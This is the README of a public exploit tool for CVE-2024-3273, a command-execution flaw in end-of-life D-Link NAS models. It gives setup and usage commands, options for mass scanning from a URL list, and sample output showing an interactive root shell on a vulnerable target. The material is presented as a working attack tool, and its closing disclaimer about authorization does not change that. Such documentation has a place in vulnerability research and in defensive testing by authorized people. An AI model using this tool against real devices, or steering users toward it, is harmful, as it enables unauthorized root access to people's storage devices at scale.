This script is a powerful exploitation tool for the CVE-2024-3273 vulnerability found in specific versions of D-Link NAS devices. It enables command execution and unauthorized access to the affected devices.
To set up the exploitation tool, follow these steps:
- Clone the repository:
git clone https://github.com/Chocapikk/CVE-2024-3273.git- Navigate to the tool's directory:
cd CVE-2024-3273- Install the required Python packages:
pip install -r requirements.txtTo use the tool, run the script from the command line as follows:
python exploit.py [options]-
-u, --url: Specify the target URL or IP address.
-
-f, --file: Specify a file containing a list of URLs to scan.
-
-t, --threads: Set the number of threads for concurrent scanning.
-
-o, --output: Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to open an interactive shell.
$ python3 exploit.py -u http://127.0.0.1
[+] Command executed successfully.
[!] http://127.0.0.1 is vulnerable to CVE-2024-3273: uid=0(root) gid=0(root)
[+] Opening interactive shell...
$ id
[+] Command executed successfully.
uid=0(root) gid=0(root)For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
python exploit.py -f urls.txtThe vulnerability affects the following versions of D-Link NAS devices:
- DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
- DNS-325 Version 1.01
- DNS-327L Version 1.09, Version 1.00.0409.2013
- DNS-340L Version 1.08
These systems are considered to be end-of-life (EOL), meaning they are no longer supported or receiving updates from the manufacturer. It is strongly recommended that these systems are no longer used.
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
Special thanks to the researcher @netsecfish for their work in identifying this vulnerability.